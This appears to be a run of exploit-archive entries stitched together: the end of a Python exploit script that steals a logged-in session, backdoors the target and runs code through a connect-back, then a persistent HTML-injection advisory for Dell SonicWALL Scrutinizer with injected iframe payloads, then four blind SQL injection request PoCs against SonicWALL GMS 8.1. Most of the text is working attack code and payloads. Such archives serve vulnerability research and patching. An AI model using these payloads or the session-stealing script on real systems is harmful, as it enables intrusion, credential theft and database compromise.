print "(+) awesome, appears like someone has logged in... "
print "(+) it took %s to detect valid session data" % (ct()-st)
sys.stdout.flush()
sys.stdout.write("(+) extracting session data... ")
dataz = steal_session(steal_session_length(), 5)
print "\n(+) backdooring target..."
kill_shot(dataz)
exec_code()
else:
print "(!) usage: %s <target> <connectback:port>" % sys.argv[0]
if __name__ == "__main__":
print banner()
main()
source: https://www.securityfocus.com/bid/57949/info
The Dell SonicWALL Scrutinizer is prone to multiple HTML-injection vulnerabilities because it fails to properly sanitize user-supplied input.
Successful exploits will allow attacker-supplied HTML and script code to run in the context of the affected browser, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user. Other attacks are also possible.
Dell SonicWALL Scrutinizer 10.1.0 and prior versions are vulnerable.
Alarm > New Board & Policy Manager - [BBSearchText] Search item <td class="textRight agNoWrap"> <input id="BBSearchText" title="Search item" value="<<[PERSISTENT INJECTED SCRIPT CODE!];)" <="""=""></iframe> <input class="button" id="BBSearchButton" value="Search" title="Search" onclick="bbSearch(this)" type="button"> <input class="button" onclick="displayBBAdvFilterModal()" title="Search using multiple criteria" value="Advanced Filters" type="button"> Review: Dashboard > Flow Expert > Mytab - [Mytab Name] <div><span class="myv_tab"><span tid="1" style="margin-left: 10px; margin-right: 10px;">Flow Expert</span></span> <span class="myv_tab"><span tid="2" style="margin-left: 10px; margin-right: 10px;">Configure Flow Analytics</span></span> <span class="myv_tab"><span tid="3" style="margin-left: 10px; margin-right: 10px;">CrossCheck</span></span><span class="myv_tab"><span tid="4" style="margin-left: 10px; margin-right: 10px;">Example</span></span><span class="myv_tab"> <span tid="5" style="margin-left: 10px; margin-right: 10px;">Cisco PfR</span></span><span class="myv_tab"><span tid="6" style="margin-left: 10px; margin-right:10px;">Training</span></span><span class="myv_selectedtab"> <span title="Click to rename" class="jedit" id="tab_7"origname="My New Tab"><[PERSISTENT INJECTED SCRIPT CODE!]">%20%20%20%20"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></span> <img style="margin-left: 6px; cursor: pointer;" src="Scrutinizer%20%29%20Dashboard-Dateien/tab-edit.gif"></span><span class="add_tab"> <span style="margin-left: 6px; cursor: pointer;">Add a tab</span></span></div> MyView (CGI) > Value - [newName] <html><head> <meta http-equiv="content-type" content="text/html; charset=UTF-8"></head> <body>{"newName":"<[PERSISTENT INJECTED SCRIPT CODE!]"> \"><[PERSISTENT INJECTED SCRIPT CODE!]") <"}</iframe></body> </html> Review: Admin > Admin > New Users & New Group - [groupname, up_availGroups & username - Place in Usergroup - Listing] <div class="unfortunate" style="" id="settingsContent"> <div id="settingsHeader"></div> <div id="settingsOutput"> <title>User Preferences</title> <div id="mainFrame"> <div style="height: 552px;" id="upMenu"><div class="basic ui-accordion selected" style="float:left;" id="upTreeMenu"> <a class="selected"> New User</a><div style="height: 511px; display: block; overflow: hidden;"class="genericAccordionContainer"> <p style="padding-left: 10px;" id="new_user_panel"><label>Username: <input class="newform" id="new_username" type="text"></label><label>Password <input class="newform" id="new_password" type="password"><img id="pw_strength" src="/images/common/strength_0.gif"></label><label>Confirm Password: <input class="newform" id="cnf_password" type="password"> </label><label style="margin-top: 5px; margin-bottom: 8px;" id="up_availGroupsLbl">Place in User Group <select style="display: block;" id="up_availGroups"><option value="3"><iframe src="a">"><[PERSISTENT INJECTED SCRIPT CODE!]") <</iframe></option> <option value="1">Administrators</option><option value="2">Guests</option></select></label>​​​​​ <input value="Create User" class="button" style="margin-top: 3px;" type="button"></p></div><a class=""> Users</a> <div style="height: 511px; display: none;overflow: hidden;class="genericAccordionContainer"><p id="users_p"><span class="menuLink">admin</span></p></div></div></div> Admin > Admin > Mapping/Maps (CGI) - Dashboard Status - [groupMembers, Type, Checkbox Linklike, indexColumn,name,ObjectName & settings groups] <div class="fmapsScroll" id="groupScroll"><table class="dataTable filterable" id="grpTable"><tbody id="grpTbody"><tr id="grpTblHdr"> <th width="20"><input id="checkAllObj" name="checkAllObj" title="Permanently delete groups" type="checkbox"></th><th style="width: 100%;" class="alignLeft">Group Name</th><th width="40">Type</th><th width="40">Membership</th><th width="40">Map Status</th></tr><tr id="grp_tr1"> <td><input title="Permanently delete this object from ALL groups" name="1" type="checkbox"></td><td class="alignLeft"><a title="Click here to edit this group" href="#NA" class="linkLike"><iframe src="a">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...</iframe></a> </td><td>Google</td><td><a title="Click to change object membership for this group" class="linkLike">Membership</a></td><td><select id="pass_1" class="passSel"><option value="0">No Pass</option> <option value="1">Pass Up</option></select></td> <td style="display: none;" class="indexColumn">%20%20%20%20[PERSISTENT INJECTED SCRIPT CODE!]"><ifra...googlemembershipno passpass up</td></tr></tbody></table></div><input style="margin-top: 10px; margin-left: 8px;" id="delObjectBtn" value="Delete" class="button" type="button"><div id="editGrpDiv"><div id="obj_typeForm"><div id="iconPreview"><img src="/images/maps/group16.png" id="previewImage"></div> <div id="toGroupMsg"></div><select style="margin-left: 30px; margin-bottom: 5px; width: 159px;" id="obj_iconSelect" name="icon"><option value="gicon16.png">gicon16.png</option><option value="gicon24.png">gicon24.png</option><option value="gicon32.png">gicon32.png</option> <option value="gicon48.png">gicon48.png</option><option value="gicon72.png">gicon72.png</option><option value="group16.png">group16.png</option> <option value="group24.png">group24.png</option><option value="group32.png">group32.png</option><option value="group48.png">group48.png</option> <option value="group72.png">group72.png</option></select></div><table id="editGroupTable" class="dataTable"><tbody><tr id="grpTypeRow"> <td class="alignLeft cellHeader">Type</td><td class="alignLeft"><select id="edit_grpType"><option value="flash">Flash</option> <table class="dataTable" id="fmaps_mapTabList" width="100%"><thead><tr>​​​​​<th style="white-space: nowrap;" nowrap="">Map</th> <th style="white-space: nowrap;" nowrap="">Type</th><th style="white-space: nowrap;" nowrap="">Background</th></tr></thead><tbody> <tr><td class="" style="white-space: nowrap; padding-right: 5px;" align="left" nowrap=""><a href="#NA"><iframe src="a">%20%20%20%20"> <iframe src=a onload=alert("VL") <</iframe></a></td><td class="" style="white-space: nowrap;" align="left" nowrap="" width="100%">Google</td> ​​​​​<td class="" align="center">-</td></tr></tbody></table> <tbody id="objTbody"><tr id="objTblHdr"><th width="20"><input id="checkAllObj" name="checkAllObj" type="checkbox"></th><th width="20"> </th>​​​​​<th style="width: 100%;" tf_colkey="objName" class="alignLeft">Object Name</th><th style="text-align: center;" align="center" nowrap=""> Type</th><th width="20">Membership</th></tr><tr id="obj_tr1"><td class="fmaps_bakTrHi highlightRow"> </td><td class="fmaps_bakTrHi highlightRow"><img class="listIcon" src="/images/maps/gicon24.png"></td><td class="alignLeft fmaps_bakTrHi highlightRow"><a title="Click to edit this object" href="#NA"><iframe src="a">%20%20%20%20"><iframe src=...</iframe></a></td><td class="fmaps_bakTrHi highlightRow" nowrap=""> <span style="cursor:default;">Group</span></td><td class="fmaps_bakTrHi highlightRow"><a title="Click to change group membership for this object" class="linkLike">Membership</a>​​​​​</td><td style="display: none;" class="indexColumn fmaps_bakTrHi highlightRow"> %20%20%20%20"><iframe src=...groupmembership</td></tr></tbody> <td style="padding-right: 1px; padding-bottom: 1px; padding-left: 1px;" id="fmaps_confBody" valign="top"><div style="height: 19px;" id="fmaps_containerTitle" class="titleBar">​​​​​<span style="float:left" ;="">Settings</span><img title="Map Settings Help" src="/images/common/help.png"><select id="fmaps_groupSelect"> <option class="google" value="1"><iframe src="a">%20%20%20%20"><iframe src=a onload=alert("VL") < (google) </iframe></option></select></div>​​​​​<div id="fmaps_confBodyContainer"><div id="defaultsContainer"> <li class="expandable noWrapOver " groupid="g1"> <div class="hitarea expandable-hitarea "> </div> ​​​​​<img src="/images/common/gicon.png" gid="1" title="<iframe src=a>%20%20%20%20">​​​​​<iframe src="a" onload="alert("VL")" <="" (group="" id:="" 1)"=""></iframe> <span id="sdfTreeLoadG" class="" title="<iframe src=a>%20%20%20%20"><iframe src=a onload=alert("VL") < (Group ID: 1)" gid="1"><iframe src="a">%20%20%20...</span> <ul style="display: none;"> <li>Loading...</li> </ul> </li> <li class='expandable noWrapOver lastExpandable'> <div class='hitarea expandable-hitarea lastExpandable-hitarea'> </div> <img src='/images/common/TreeUngroupGray.png'/><span class="">Ungrouped</span> <ul style="display: none;"> <li class="last"><span class=" ">No Devices</span></li> </ul> </li> </ul> </iframe></span></li>
Dell SonicWALL Global Management System GMS 8.1 Blind SQL Injection
Vendor: Dell Inc.
Product web page: https://www.sonicwall.com/products/sonicwall-gms/
Affected version: 8.1
8.0 SP1 Build 8048.1410
Flow Server Virtual Appliance
Fixed in: 8.2 (VR-2016-01-C0V)
Summary: Provide your organization, distributed enterprise or managed
service offering with an intuitive, powerful way to rapidly deploy and
centrally manage SonicWall solutions, with SonicWall GMS. Get more value
from your firewall, secure remote access, anti-spam, and backup and recovery
solutions with enhanced network security monitoring and robust network
security reporting. By deploying GMS in an enterprise, you can minimize
administrative overhead by streamlining security appliance deployment
and policy management.
Desc: Dell SonicWALL GMS suffers from multiple SQL Injection vulnerabilities.
Input passed via the GET parameters 'searchBySonicwall', 'firstChangeOrderID',
'secondChangeOrderID' and 'coDomainID' is not properly sanitised before being
returned to the user or used in SQL queries. This can be exploited to manipulate
SQL queries by injecting arbitrary SQL code.
Tested on: SonicWALL
MySQL/5.0.96-community-nt
Apache-Coyote/1.1
Apache Tomcat 6.0.41
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2016-5388
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2016-5388.php
Vendor: https://support.sonicwall.com/product-notification/215257?productName=SonicWALL%20GMS
26.01.2016
--
Blind SQL Injection via several parameters:
- searchBySonicwall (GET)
- coDomainID (GET)
- firstChangeOrderID (GET)
- secondChangeOrderID (GET)
PoC:
#1
GET /sgms/TaskViewServlet?page=taskView&level=1&node_id=null&screenid=15200&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null'%2b(select*from(select(sleep(6)))a)%2b' HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#2
GET /sgms/Logs?page=logView&searchByCO=Workflow%20Change%20Order%20Example&coDomainID=DMN0000000000000000000000001'%2b(select*from(select(sleep(6)))a)%2b'&level=1&node_id=null&screenid=15150&unused=&help_url=&node_name=null&unitType=0&searchBySonicwall=null HTTP/1.1
Host: 127.0.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
Referer: http://127.0.0.1/sgms/content.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#3
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&secondChangeOrderID=CHO14520472477130040102377D2&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close
#4
GET /sgms/workflow?page=fetchCompareScreens&firstChangeOrderID=CHO14532479280350040102377D2&secondChangeOrderID=CHO14520472477130040102377D2'%2b(select*from(select(sleep(6)))a)%2b'&_dc=1453805798333&node=root HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.111 Safari/537.36
X-Requested-With: XMLHttpRequest
Accept: */*
Referer: http://127.0.0.1/sgms/viewdiff.jsp
Accept-Encoding: gzip, deflate, sdch
Accept-Language: en-US,en;q=0.8
Cookie: JSESSIONID=DF100D251227D2BCF4DE79779C0B57E3; JSESSIONID=36E7B71D9E7367E56E005E279BCBECED; SSOSESSIONID=DF100D251227D2BCF4DE79779C0B57E3
Connection: close